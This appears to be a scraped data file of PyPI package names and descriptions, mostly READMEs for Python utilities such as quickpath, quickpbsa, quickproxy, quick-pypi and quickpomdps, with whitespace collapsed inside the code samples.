snippet.quickparse.validate({'parameters':{'mincount':1,},'options':{'mandatory':'--branch','optional':'--stage',},'numeric':{'maxcount':0},'plusnumeric':{'maxcount':0},})assert'parameters.mincount'notinquickparse.errors,f'Add a target'assertnotquickparse.has_errors,'\\n'.join(quickparse.error_messages)"} +{"package": "quick-passwd-gener", "pacakge-description": "This package has a method that generates and returns a random password with the user specified input length for the password to be generated."} +{"package": "quick-password", "pacakge-description": "it's so easy to use"} +{"package": "quickpath", "pacakge-description": "QuickPathQuickPath is a package, which provides functions for easy access the elements of collection/object structures.Motivating exampleanimals=[{'name':'Wombat','avg_properties':{'height':{'value':66,'unit':'cm'},'length':{'value':108,'unit':'cm'},'weight':{'value':27,'unit':'kg'}}},{'name':'Duck','avg_properties':{'height':{'value':62,'unit':'cm'},'weight':{'value':1,'unit':'kg'}}},{'name':'Dog','max_properties':{'height':{'value':95,'unit':'cm'},'weight':{'value':105,'unit':'kg'}}},]Let's query that above structure:foranimalinanimals:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"])This code will abort with error as no theDuckhas nolengthkey. 
We have to add one more check.foranimalinanimals:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"]if\"length\"inanimal[\"avg_properties\"]else'-')This improved code will still fail asDoghas onlymax_propertykey, we have to handle this situation too.foranimalinanimals:if\"avg_properties\"inanimaland\"length\"inanimal[\"avg_properties\"]:print(animal[\"name\"],'average length',animal[\"avg_properties\"][\"length\"][\"value\"])else:print(animal[\"name\"],'avarage length',\"-\")The above scenarios can be simplified byquickpath:fromquickimportimportgetpathforanimalinanimals:print(animal[\"name\"],'average length',getpath(animal,(\"avg_properties\",\"length\",\"value\"),default='-'))Alternatively, the keys can be represented as a single string:fromquickimportimportgetpathsforanimalinanimals:print(animal[\"name\"],'average length',getpaths(animal,\"avg_properties.length.value\"),default='-'))Separator can be changed to any alternative characters:fromquickimportimportgetpathsforanimalinanimals:print(animal[\"name\"],'average length',getpaths(animal,\"avg_properties/length/value\"),default='-',sep='/')"} +{"package": "quickpath-airflow-operator", "pacakge-description": "Quickpath Airflow OperatorAllows from Execution of Blueprints on the Quickpath Platform from within AirflowInstallationpip install quickpath-airflow-operatorConnectionsConnections can be created asHTTPTypeService Connection (QPP-Group)Service Connection is Required for Blueprint ExecutionConnection ID = `QPP-Group`\nConnection Type = `HTTP`\nSchema = `https`\nHost = ``\nPassword = ``API Connection (QPP-User)API Connection is only required ifpoll_for_results=TrueConnection ID = `QPP-User`\nConnection Type = `HTTP`\nSchema = `https`\nHost = ``\nPassword = ``UsageImportfrom quickpath_airflow_operator import QuickpathPlatformOperator`Syncronous Execution will execute a blueprint, wait for the result, and return itquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=True,\n)Produces XCom Keysblueprint_uuidandblueprint_responseAsyncronous Execution With Result Polling will execute a blueprint and poll for the blueprint resultsAsyncronous Execution will execute a blueprint and return the Blueprint UUIDquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=False,\n poll_for_results=True,\n max_polls=20,\n poll_interval=5\n)Produces XCom Keysblueprint_uuidAsyncronous Execution will execute a blueprint and return the Blueprint UUIDquickpath_execution = QuickpathPlatformOperator(\n task_id=\"run_blueprint\",\n service_connection_id=\"QPP-Group\",\n api_connection_id=\"QPP-User\",\n environment_name=\"design\",\n blueprint_endpoint=\"blueprint_endpoint\",\n request_object={},\n synchronous=False,\n poll_for_results=True,\n)Produces XCom Keysblueprint_uuidandblueprint_response"} +{"package": "quickpathstr", "pacakge-description": "QuickPathStrCopyright (c) 2023 Sean Yeatts. All rights reserved.This module provides syntax for working with strings in the context of file\nmanagement. 
It's designed to reinforce a universal nomenclature by which files,\ntheir types, and their directories may be referred.API ReferenceThe core of the API is captured within theFilepathclass:classFilepath:# Deconstructs a complete filepath into its constituent elementsdef__init__(self,complete:str)->None:self.complete=complete# Ex: C:\\Users\\myself\\Desktop\\MyFile.txtself.directory=str(Path(self.complete).parent)# Ex: C:\\Users\\myself\\Desktopself.name=str(Path(self.complete).name)# Ex: MyFile.txtself.root=str(Path(self.complete).stem)# Ex: MyFileself.extension=str(Path(self.complete).suffix)# Ex: .txt"} +{"package": "quickpay-api-client", "pacakge-description": "No description available on PyPI."} +{"package": "quickpbsa", "pacakge-description": "quickpbsaFast and Complete Photobleaching Step AnalysisAuthor:Johan HummertOrganization:Herten Lab for Single Molecule Spectroscopy, University of Birmingham, UKLicense:GPLv3Version:2020.0.1Python Package providing a framework for photo-bleaching step analysis. The details of the algorithm used and extensive validation with experimental data are described in a bioRxiv preprint:https://doi.org/10.1101/2020.08.26.268086please cite this publication if you found this package useful.ChangelogNew in version 2021.0.1ParallelisationThe trace analysis can now be run on multiple cores, implemented using multiprocessing. In the analysis functions this can be specified by calling:pbsa.pbsa_file(file,threshold,maxiter,num_cores=8)One core is reserved for queueing and formatting outputs, so if you specify 8 cores, 7 will be used for the analysis. If the code runs on a compute cluster note that the parallisation does not support parallelisation over multiple nodes.DependenciesAlthough the package was tested with specific versions of these packages, other relatively new versions will likely work as well. If you have issues with newer versions of these packages get in touch. If you have issues with older versions please consider updating.Python 3:Tested with python 3.8numpy:Tested with numpy-1.18.2scipy:Tested with scipy-1.4.1pandas:Tested with numpy-1.0.3sympy:Tested with 1.5.1Optional dependendencies for trace extractionIf you want to use the package not only for analysis of photobleaching traces but also for trace extraction from .tiff stacks there are additional dependencies:tifffile:Tested with tifffile-2019.2.10matplotlib:Tested with matplotlib-3.2.1InstallationThe recommended way to install is via pip:pipinstallquickpbsaAlternatively you can clone / download the git repository and place the directory quickpbsa/quickpbsa in your $PYTHONPATH.Getting startedIf you already have photobleaching traces which you would like to analize, running the analysis is a one-liner:importquickpbsaaspbsapbsa.pbsa_file(file,threshold,maxiter)For this to work thefileshould be a .csv file, where each row is one photobleaching trace, which ideally, but not necessarily, should be background subtracted. Then there are two additional parameters to set in the analysis,thresholdandmaxiter. There are many additional optional parameters to set, detailed below, but in many cases the default parameters should be alright.thresholdshould be set to approximately half the intensity difference of a typical photobleaching step. This is most easily accomplished by plotting a few traces and finding steps towards the end of the trace, where steps can most easily be found by eye.maxiteris the maximum number of iterations (i.e. maximum number of steps found). 
This should be significantly higher than the expected number of steps. In the validation experiments we performed this would typically be set to 200 for samples with up to 35 fluorophores.Structure of the resultThe result is exported as a _result.csv file with 7 rows per photobleaching trace. The final result of the complete analysis for each trace is the one with the type 'fluors_full' in the output file. Furthermore traces where the column 'flag' is not 1 should be discarded. The complete structure of the output file and the individual flags are detailed in the Concept below. Examples on how to use the output are also provided under Examples.with trace extractionIf you have a stack of .tif images and want to extract and analyze traces from it make sure that you havetifffileinstalled. Then there are two options to get traces from your image stack, both of which will yield a _difference.csv file containing background corrected traces ready for the analysis:based on localizationIf the structures from which you want to extract fluorophore numbers are diffraction-limited, you can extract traces based on a .csv file with coordinates (in nanometers) for each diffraction limited spot. The file should contain at least 2 columns named 'x [nm]' and 'y [nm]'. Our recommended way of obtaining such a file is theFijipluginThunderSTORM.The trace extraction can then be accomplished withimportquickpbsaaspbsapbsa.trace_extraction.extract_traces_localization(tiffstack,locfile,r_peak,r_bg1,r_bg2,min_dist)withtiffstackbeing the path to your image stack andlocfilethe path to the localization file.r_peakis the radius (in pixels) of the area around the localization from which the trace is extracted.r_bg1andr_bg2define a ring around the localization from which the background for background correction is extracted.min_distis the minimum distance from one localization to the next. Localizations which are spaced less thanmin_distapart are not considered in the trace extraction.based on a selection maskIf you have larger structures from which to extract photobleaching traces and fluorophore numbers, you can use a mask image which should be an 8bit Tiff with a white selection on black background. The traces are then extracted from non-connected white regions of interest (ROIs or RsOI ...?) in the mask image.importquickpbsaaspbsapbsa.trace_extraction.extract_traces_mask(tiffstack,maskfile,dist,r_bg)where a background ROI with a distance ofdist(in pixels) to the selected ROI and a width ofr_bgis defined for background correction.ConceptThis photobleaching step analysis is a combination of a preliminary step detection and a following refinement of the preliminary result based on a bayesian approach. A full run of the analysis after trace extraction consists of 3 parts.Preliminary step detectionThe preliminary step detection is based on the work of Kalafut and Visscher(10.1016/j.cpc.2008.06.008). In the algorithm steps are sucessively placed and the Schwarz Information Criterion is evaluated with and without the added steps. 
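To make that criterion concrete, here is a rough, illustrative sketch (not code taken from quickpbsa itself) of how one candidate step can be scored: a piecewise-constant fit is made with and without the step, and the residual variance is penalised by the number of fitted levels, so a step is only worth keeping if it lowers the criterion. The exact penalty and acceptance rule inside quickpbsa may differ; this only conveys the shape of the test.

```python
import numpy as np

def sic(trace, breakpoints):
    """Schwarz information criterion of a piecewise-constant fit.
    Illustrative only -- the exact form used by quickpbsa may differ."""
    n = len(trace)
    segments = np.split(trace, breakpoints)
    # residual sum of squares around the per-segment means
    rss = sum(((seg - seg.mean()) ** 2).sum() for seg in segments if len(seg))
    k = len(breakpoints) + 1              # number of fitted intensity levels
    return n * np.log(rss / n) + k * np.log(n)

# A candidate step at frame 120 is accepted only if it improves the criterion:
# accept = sic(trace, [120]) < sic(trace, [])
```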
In the modified version used here steps with a step height below thethresholdparameter are rejected.The optional parameters of the preliminary step detection can be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'norm':1000,'crop':False}pbsa.pbsa_file(file,threshold,maxiter,preliminary_optional=pardict)Possible parameters are:norm (default 1)The traces will be divided bynormprior to analysis, mainly for visualization.thresholdshould be set lower accordingly.crop (default True)IfTruethe last frames of the trace are cropped for analysis purposes based onthreshold. Traces are cropped at the last frame where the difference in intensity exceeds half the value ofthreshold+bgframes.bgframes (default 500)How many frames to include in the analysis after the crop point.max_memory (default 2.0)Maximum available memory for the preliminary step detection. The analysis defaults to a slower, but less memory consuming implementation if the necessary memory exceeds this value. For the default of 4 GB the fast implementation is used for traces with up to ~40000 frames.Filtering of tracesBased on the result of the preliminary step detection traces are excluded from the analysis. Assuming that the last two steps are correctly identified in a majority of traces, traces are flagged out. The used flags in the output file are:flagMeaning-1No steps found in preliminary step detection-2Background intensity out of bounds-3Single fluorophore intensity out of bounds-4Trace goes into negative values-5Fluorophore number becomes negative-6interval between final two steps is too shortThe optional parameters of the preliminary step detection can be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'subtracted':False,'percentile_step':[20,80]}pbsa.pbsa_file(file,threshold,maxiter,filter_optional=pardict)Possible parameters are:subtracted (default True)IfTrueit is assumed that traces are background corrected. This sets the bounds on the background intensity to[-threshold, threshold]and the default lower bound on the single fluorophore intensity tothreshold. IfFalsethe bounds on the background intensity are set based on the minimum background intensity in the datasetmin_bg:[min_bg, min_bg + threshold]. IfFalsethe default lower bound on the single fluorophore intensity is alsomin_bg + threshold.percentile_step (default 90)Sets the bounds on the single fluorophore intensity. If one value is provided, the upper bound on the single fluorophore intensity is set at this percentile. If two values are provided, as in the example above, lower and upper bounds are set at the percentiles respectively.length_laststep (default 20)Minimum number of frames between the last two steps.Step refinementThe step refinement is based on the posterior as defined in the work of Teskouras et al.(10.1091/mbc.e16-06-0404). The refinement function iteratively minimizes this posterior starting from the result of the preliminary step detection.Most of the optional parameters aim to reduce runtime by reducing the number of possible step arrangements to test. 
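Schematically, that search can be pictured as scoring candidate step arrangements and keeping whichever one minimises the posterior; the loop below is a deliberately simplified illustration with placeholder names, not the package's actual implementation, which is why capping the number of candidate arrangements matters so much for runtime.

```python
def refine(candidate_arrangements, posterior):
    """Return the step arrangement with the lowest posterior score.

    `candidate_arrangements` is any iterable of candidate arrangements
    (e.g. lists of step positions and occupancies) and `posterior` is a
    callable scoring one arrangement; both names are placeholders.
    """
    best, best_score = None, float("inf")
    for candidate in candidate_arrangements:
        score = posterior(candidate)
        if score < best_score:
            best, best_score = candidate, score
    return best
```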
The optional parameters of the step refinement can also be set by providing a dictionary as an optional argument inquickpbsa.pbsa_file():importquickpbsaaspbsapardict={'mult_threshold':1.5,'combcutoff':int(5e6)}pbsa.pbsa_file(file,threshold,maxiter,refinement_optional=pardict)Possible parameters are:multstep_fraction (default 0.5)Maximum fraction of steps with an occupancy higher than 1.nonegatives (default False)IfTrue, no negative double steps are considered. This means that arrangements where 2 or more fluorophore turn back on at the same time are not considered.mult_threshold (1.0)Only steps where the difference in the mean is abovemult_thresholdmultiplied by the last fluorophore intensity are considered as steps with occupancy higher than 1.combcutoff (default 2000000)Maximum number of arrangements to test. If this is exceeded, the trace is flagged out with flag-7. If this happens a lot, consider increasing this value, which will increase runtime.splitcomb (default 30000)How many arrangements to test simultaneously (vectorized). On systems with a large memory this can be increased to speed up the analysis.maxmult (default 5)Maximum considered occupancy, i.e. how many fluorophores can bleach simultaneously.maxadded (default 10)Maximum number of added single steps if no steps are removed to yield an improved posterior.lambda (default 0.1)Hyperparameter $\\lambda$ in equation (1).gamma0 (default 0.5)Hyperparameter $\\gamma_0$ in equation (1).ExamplesDetailed examples with a more in-depth explanation of the algorithm are available in two jupyter notebooks explaining how the analysis works on an example trace (Examples/Example_Trace.ipynb) and an example tiff-stack (Examples/Example_Stack.ipynb) with the included experimental example data. You will need to installjupyterandmatplotlibto run the examples."} +{"package": "quick-pdf", "pacakge-description": "quickpdfInstallationpipinstallquick-pdfUsageMerge PDFquickpdf_merge--helpquickpdf_merge-dir."} +{"package": "quick-perf-tracer", "pacakge-description": "quick_perf_tracerDecodes the perfetto traces super fast"} +{"package": "quickpiggy", "pacakge-description": "QuickPiggyLaunch an impromptu PostgreSQL server, hassle free.Prerequisites:postgresql-server (tested with v9.0 - v13.2), providingpostgres,initdbandcreatedbon your$PATHpostgresql libraries and clients (tested with v9.0 - v13.2), providingpsqlon your$PATHThis is mainly a library module, but you can take it for a for a demo spin by runningquickpiggy.pyas a program (python quickpiggy.py).When used as a library, an ephemeral PostgresSQL instance can be obtained quite easily:pig=quickpiggy.Piggy(volatile=True,create_db='somedb')conn=psycopg2.connect(pig.dsnstring())Many use cases can be accommodated for by supplying appropriate parameters to the constructor of Piggy.This version works with Python 2.7 and 3.1+."} +{"package": "quickping", "pacakge-description": "Quickping\ud83e\udd2f \ud83d\ude80 QuickPing is super fast python package and command line tool to show Active and Deactive Addresses in range of IPv4 Adresses using mutli-threadsInstallpip install quickpingLicenseApache-2.0check out LICENSE file"} +{"package": "quickpip", "pacakge-description": "quickpip - This .rst is seen on pypi."} +{"package": "quickplot", "pacakge-description": "The batteries-included plotting wrapper for matplotlib"} +{"package": "quick-plot", "pacakge-description": "quick plotThe scripting interface of matplotlib is stateful, therefore\ndangerous. 
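For readers who have not hit the problem being alluded to: the pyplot scripting interface routes every call through an implicit current figure and axes, so the outcome of each call depends on hidden global state. A generic matplotlib illustration of that style (not part of quick-plot itself):

```python
import matplotlib.pyplot as plt

plt.plot([1, 2, 3])   # drawn onto whatever the *current* axes happens to be
plt.title("hidden module-level state decides where this title lands")
plt.show()            # renders the implicitly tracked current figure(s)
```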
The object oriented interface to the plotting library is\npolluted. This tiny library combines the two interfaces into one\ncontext manager.fundamentIf this file is somewhere in your =$PYTHONPATH=, the following code\nshould produce a plot.\u00b4\u00b4\u00b4python\nimport numpy as np\nimport quickwith quick.Plot() as qp:\nqp.plot(np.sin(np.linspace(0, 2 * np.pi)))\n\u00b4\u00b4\u00b4The =Plot= class is the only available class in the =quick= module. It\nshould be instantiated exactly once. Its instance can do everything\nthe matplotlib axis object can do. For some methods, a default\nconfiguration is supplied. There are some methods, that are not\ncontained in the axis object, for example =trajectory=, =field=, =points=,\n=remove_border=, =remove_xticks=. When a method is called, that is neither\na method of the =axis= object, nor one of the additional methods of this\nmodule, then the module =matplotlib.pyplot= is searched for a function\nwith that name, and, if it exists, it is called. When the context\nmanager is left, the plot shows up.arguments=Plot= takes optional arguments.\n| =filename= | given that, the plot is not shown interactively, but saved as a file, default =None= |\n| =figsize= | a tuple, representing (width, height), default =(3, 3)= |\n| =grid= | if =True= shows a grid, default =False |\nall other optional arguments are directly passed to =matplotlib.pyplot.subplot=.short formIf you just want to quickly see some of your data, and you do not want\nto do any customization of the plotting result, the context manager is\na bit of a boilerplate. So there is the following shorthand for the\nprevious script.\u00b4\u00b4\u00b4python\nimport numpy as np\nimport quickquick.plot(np.sin(np.linspace(0, 2 * np.pi)))\n\u00b4\u00b4\u00b4The context manager is called implicitly.more convenienceThe quick module additionally provides a few methods that are not\ndirectly related to the =matplotlib= plotting facility, e.g.=colored=: takes a list of array and return an iterator with tuple,\nwith the data and a color, that can be past to the color argument of\nplotting methods. Optional argument is the name of a colormap=landscape=, =portrait=: they return tuples that can be past to the\n=figsize= argument of =Plot=, internally using the golden ratio.=tex=: surround a string by dollar signs.drawbackThere is no interactive workflow anymore with this approach. I like\nthat way of working, because due to script restarts you eliminate all\nerrors in your script, that may occur from state changes from the\npast, that confuses the (fragile) python module system."} +{"package": "quickplotlib", "pacakge-description": "QuickplotThis is a beta release of the quickplot module, a wrapper around pandas, matplotlib, and seaborn used to quickly create beautiful viz for analytics.To install, run:pip install quickplotlib"} +{"package": "quickplot-niccolo-hamlin", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickplots", "pacakge-description": "An object-oriented plotting library for Python, with simplicity as its principal aim."} +{"package": "quickplotter", "pacakge-description": "Instant EDAInstantly generate common exploratory data plots without having to worry about cleaning your data.Note: To find the most updated documentation, visit the Githubrepo.Description: Thequickplottermodule provided here is meant to provide common exploratory data plots without having to worry about cleaning your DataFrame or preanalyzing your data. 
Additionally, these plots can be exported to.{png, jpeg}for use in reports and papers.1. Basic Usage:plotter=quickplotter.QuickPlotter(df:pd.DataFrame)#creates a QuickPlotter object with the given DataFrameplotter.common(subset=['correlation','percent_nan'])#plots correlation between features, and percent nan in each columnplotter.distribution(column_subset=df.columns[0:4])#plots distributions for the first four columns in the DataFrameplotter.common(column_subset=['body_mass_index','blood_type'])#plots common plots for the given columns2. FundamentalsIf the number ofNaNvalues in the DataFrame is<= 5%of the total values, the NaN rows will be dropped and the plots will be generated without them.Remember, this is meant to be a quick and dirty tool for exploration, and not for being delicate with each data entry.subset & diff listsThe quickplot module works mainly with two specifications,subsetanddiff.For anysubset-like list, the items in the list will be used. For anydiff-like list, all itemsexceptthose in the list will be used.The options are as follow:subset: Use only the plots specified in the listdiff: Use all plotsexceptthose specified in the listsubset_columns: Use all columns specified in the list. Can either bedf.columnsslicing or by namediff_columns: Use all columnsexceptthose specified in the list. Can either bedf.columnsslicing or by name.3. ContributingIf you have read this far I hope you've found this tool useful. I am always looking to learn more and develop as a collaborative programmer, so if you have any ideas or contributions, feel free to write a feature or pull request."} +{"package": "quickplug", "pacakge-description": "No description available on PyPI."} +{"package": "quickpomdps", "pacakge-description": "quickpomdps - pythonquickpomdpsis a package to quickly define[PO]MDPsin Python.\nYou can use any of the solvers inPOMDPs.jlecosystem, directly in Python.A hybrid continuous-discrete light-dark problem definition and QMDP solution (taken fromexamples/lightdark.py) looks like this:r=60light_loc=10deftransition(s,a):ifa==0:returnDeterministic(r+1)else:returnDeterministic(min(max(s+a,-r),r))defobservation(s,a,sp):returnNormal(sp,abs(sp-light_loc)+0.0001)defreward(s,a,sp):ifa==0:return100.0ifs==0else-100.0else:return-1.0m=QuickPOMDP(states=range(-r,r+2),actions=[-10,-1,0,1,10],discount=0.95,isterminal=lambdas:s<-rors>r,obstype=Float64,transition=transition,observation=observation,reward=reward,initialstate=Uniform(range(-r//2,r//2+1)))solver=QMDPSolver()policy=solve(solver,m)Installationpipinstallquickpomdpsquickpomdpsuses thepyjulia packagewhich requires julia to be installed. We recommend usingjuliaupfor this purpose.Upon invocation ofimport quickpomdsin Python, all Julia dependencies will be installed if they are not already present.\nPlease note that, by default, the Julia dependencies are added to theglobalenvironment.\nIf you want to install these dependencies to a local environment instead, export theJULIA_PROJECTwith the desired path as documentedhere.DevelopmentThis package usespython-poetryfor dependency\nmanagement. Thus, it may be installed via one of the mayways supported by poetry, for example,gitclonehttps://github.com/JuliaPOMDP/quickpomdpscdquickpomdps\npoetryinstall\npoetryrunpythonexamples/lightdark.pyUsageSeeexamples/andtests/. 
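One orientation note for the lightdark snippet shown above: the names it relies on (QuickPOMDP, QMDPSolver, solve, Deterministic, Uniform, Normal) are imported from the Julia ecosystem through pyjulia. The import block below is only a hedged guess at what that looks like; the exact module paths are an assumption and vary between POMDPs.jl/POMDPTools versions, so treat examples/lightdark.py in the repository as the authoritative reference:

```python
# Assumed module paths -- check examples/lightdark.py for the real imports.
from quickpomdps import QuickPOMDP                    # Python-facing model constructor
from julia.POMDPs import solve                        # generic solve(solver, problem)
from julia.QMDP import QMDPSolver                     # solver used in the snippet
from julia.POMDPTools import Deterministic, Uniform   # discrete distributions
from julia.Distributions import Normal                # Gaussian observation model
```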
Documentation can be found at theQuickPOMDPs.jlandPOMDPs.jlpackages.HelpIf you need help, please ask on thePOMDPs.jl discussions page!"} +{"package": "quickpool", "pacakge-description": "quickpoolUse ProcessPoolExecutor and ThreadPoolExecutor from concurrent.futures with a progress bar and less boilerplate.InstallationInstall with:pip install quickpoolUsage>>> import random\n>>> import time\n>>> import quickpool\n>>> def naptime(base_duration: float, multiplier: float, return_val: int)->int:\n... time.sleep(base_duration * multiplier)\n... return return_val\n...\n>>> def demo():\n... iterations = 25\n... pool = quickpool.ThreadPool(\n... functions = [naptime] * iterations,\n... args_list = [(random.random() * 5, random.random()) for _ in range(iterations)],\n... kwargs_list = [{\"return_val\": i} for i in range(iterations)])\n... results = pool.execute()\n... print(results)\n...\n>>> demo()\n \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100% 3s\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]"} +{"package": "quick-pp", "pacakge-description": "quick_ppPython package to assist in providing quick-look/ preliminary petrophysical estimation.Free software: MIT licenseDocumentation:https://quick-pp.readthedocs.io.FeaturesTODOHistory0.1.0 (2023-10-08)First release on PyPI.0.1.2 (2024-01-19)Refactor config.0.1.3 (2024-01-20)Update requirements.0.1.4 (2024-02-04)Update docstrings."} +{"package": "quick-preprocessing", "pacakge-description": "## quick_preprocessing\nThis package is meant to quickly preprocess text data to save developers time. This package includes lemmatization, stemming, punctuation removal, spelling correction, stopwords removal and many more.##Documentationhttps://ankurdas-krypto.github.io/quick_preprocessing/"} +{"package": "quickprophet", "pacakge-description": "Quick-ProphetA quick workflow using Prophet with relatively easy datasets. It can be modified to take any of the usual behaviours of Prophet, and can run a Prophet model on each group in a specified collection of groups."} +{"package": "quickproxy", "pacakge-description": "A lightweight, asynchronous, programmable HTTP proxy for python. Built with Tornado.## Use#### A simple proxy:import quickproxy\nquickproxy.run_proxy(port=8080)#### A reverse proxy:This proxy will fetch responses from an AWS s3 bucket with the same ID as the request\u2019s hostname.def callback(request):request.host = request.host+\u201d.s3-website-us-east-1.amazonaws.com\u201d\nrequest.port = 80\nreturn requestquickproxy.run_proxy(port=8080, req_callback=callback)## ReferenceQuickproxy exposes just one function:run_proxy(port,methods=[\u2018GET\u2019, \u2018POST\u2019],\nreq_callback=DEFAULT_CALLBACK,\nresp_callback=DEFAULT_CALLBACK,\nerr_callback=DEFAULT_CALLBACK,\nstart_ioloop=True)It runs a proxy on the specified port. You can pass the following parameters to configure quickproxy:methods: the HTTP methods this proxy will supportreq_callback: a callback that is passed a RequestObj that it shouldmodify and then return. By default this is the identity function.resp_callback: a callback that is given a ResponseObj that it shouldmodify and then return. 
By default this is the identity function.err_callback: in the case of an error, this callback will be called.there\u2019s no difference between how this and the resp_callback are\nused. By default this is the identity function.start_ioloop: if True (default), the tornado IOLoop will be startedimmediately.### Request callback functionsThe request callback should receive a RequestObj and return a RequestObj.request_callback(requestobj)return requestobjThe RequestObj is a python object with the following attributes that can be modified before it is returned:protocol: either \u2018http\u2019 or \u2018https\u2019host: the destination hostname of the requestport: the port for the requestpath: the path of the request (\u2018/index.html\u2019 for example)query: the query string (\u2018?key=value&other=value\u2019)fragment: the hash fragment (\u2018#fragment\u2019)method: request method (\u2018GET\u2019, \u2018POST\u2019, etc)username: always passed as None, but you can set it to override the userpassword: None, but can be set to override the passwordbody: request body as a stringheaders: a dictionary of header / value pairs(for example {\u2018Content-Type\u2019: \u2018text/plain\u2019, \u2018Content-Length\u2019: 200})follow_redirects: true to follow redirects before returning a response### Response callback functionsThe response and error callbacks should receive a ResponseObj and return a ResponseObj, similar to the request callback above.The ResponseObj is a python object with the following attributes that can be modified before it is returned:code: response code, such as 200 for \u2018OK\u2019headers: the response headerspass_headers: a list or set of headers to pass along in the response. Allother headers will be stripped out. By default this includes:(\u2018Date\u2019, \u2018Cache-Control\u2019, \u2018Server\u2019, \u2018Content-Type\u2019, \u2018Location\u2019)body: response body as a string## CreditsMuch of this code was adopted from Senko\u2019s tornado-proxy:https://github.com/senko/tornado-proxy\u2026which is itself based on the code by Bill Janssen posted to:http://groups.google.com/group/python-tornado/msg/7bea08e7a049cf26"} +{"package": "quickpt", "pacakge-description": "About The ProjectThis is a small Python Function that allows you to see the variance, percentage of missing values and unique values within a dataset.pip install quickptfromquickpt.quickptimportquickptquickpt(df,graph=None,encode=True,width=800,height=400)More information on the projectGitHubContributingContributions are what make the open source community such an amazing place to learn, inspire, and create. 
Any contributions you make aregreatly appreciated.Fork the ProjectCreate your Feature Branch (git checkout -b feature/AmazingFeature)Commit your Changes (git commit -m 'Add some AmazingFeature')Push to the Branch (git push origin feature/AmazingFeature)Open a Pull RequestChange Log0.0.1 (06/02/22)First Release\n0.0.2 (06/02/22)Update Readme and GitHub Link\n0.0.3 (06/02/22)testing until working\n0.0.4 (06/02/22)testing until working\n0.0.5 (06/02/22)Set encoder default to False\n0.0.6 (06/02/22)added width and height parameters for graph visualization\n0.0.7 (06/03/22)fixed variance calculation"} +{"package": "quickpy", "pacakge-description": "UNKNOWN"} +{"package": "quick.py", "pacakge-description": "UNKNOWN"} +{"package": "quick-pypi", "pacakge-description": "Quick-PyPIThe simplest and quickest way to build and publish a PyPI packageInstallationpip install quick-pypiMinimum ExampleBefore you start, you need to have several things:Determine a unique PyPI package name, easy to remember, like 'quick-pypi-test';Have a PyPI account, then export your upload token to a txt file in your computer;Use PyCharm IDE or VSCode to develop your own package. We support Jupyter Notebook now!Step 1: Prepare your project tree like:Project Root\n -- src\n -- your_package_name\n -- __init__.py\n -- your_class.py # where you can write your own code!\n -- dists # auto generated folder storing uploading version history\n -- 0.0.1\n -- 0.0.2\n -- ...\n -- VERSION # a file storing the latest version of uploading\n quick_pypi.py # Main settings of uploading packageStep 2: The simplestquick_pypi.pyfile content is below:fromquick_pypi.deployimport*auto_deploy(cwd=os.path.dirname(os.path.realpath(__file__)),# When using jupyter notebook, using `cwd=os.getcwd()`name=\"quick-pypi-test\",description=\"This is a quick-pypi-test package!\",pypi_token='../../pypi_upload_token.txt',# the token string or path from your PyPI account)Step 3: Deploy the package to PyPI serverAfter you finish writing your codes in thesrcpackage, you can just simply right-click thequick-pypi.pyto run, and wait for its completion.Step 4: Check if the package is uploaded successfully!Complicated Example settings for advanced usersA real example is here:fromquick_pypi.deployimport*# or you can use: `from quick_pypi.deploy_toml import *`auto_deploy(cwd=os.path.dirname(os.path.realpath(__file__)),name=\"pyrefworks\",long_name=\"A Python Toolkit for RefWorks Data Analysis\",description=\"Converting RefWorks files into a CSV table file\",long_description=\"This is a project to convert RefWork files to a CSV file\",src_root=\"src\",dists_root=f\"dists\",pypi_token='../pypi_upload_token.txt',# a file storing the token from your PyPI accounttest=False,# determine if uploading to test.pypi.orgversion=\"0.0.1a0\",# fixed version when uploading or using version='auto'project_url=\"http://github.com/dhchenx/pyrefworks\",author_name=\"Donghua Chen\",author_email=\"xxx@xxx.com\",requires=\"quick-csv\",license='MIT',license_filename='LICENSE',keywords=\"refworks, csv file\",github_username=\"dhchenx\",max_number_micro=20,# major.minor.micromax_number_minor=20,# version maximum numbers in each part, e.g. 
0.0.20 --> 0.1.0; 0.20.20 --> 1.0.0# only_build=True)Here you can provide more information about your package, like setting your author's name, email, license, short or long names and descriptions, etc.Deploy to local computer without uploadimportquick_pypiasqpqp.deploy(src_root=\"src\",dist_root='data/dist1',# name=\"quick-pypi-test\",# description=\"This is a quick-pypi project\",version=\"0.0.1a0\",# fixed version number, wont change# project_url=\"http://github.com/dhchenx/quick-pypi-test\",# author_name=\"Donghua Chen\",# author_email=\"douglaschan@126.com\",# requires=\"jieba;quick-crawler\",# license='MIT',# license_filename='LICENSE')This will generate a series of actual package files (e.g. README.md, LICENSE,setup.py, etc. ).Then, you can manually build the package through twine in the directory ofdist1.An example using our toolkit to deploy in the PyPI platform is demonstratedhere.LicenseThequick-pypiproject is provided byDonghua Chen."} +{"package": "quick-pypi-test", "pacakge-description": "A quick-pypi-test package!This is a quick-pypi-test package!Installationpip install quick-pypi-test==0.0.4LicenseThis project follows the MIT license."} +{"package": "quickpython", "pacakge-description": "Read Latest Documentation-Browse GitHub Code RepositoryQuickPYTHONA retro-futuristic educational interactive coding environment. Powered by Python and nostalgia.Key featuresMouse supportFuturistic blue color schemeAuto-formattingIntegrated Debugging SupportQuick shortcuts for creating new dataclasses, static methods, etcBuilt-in 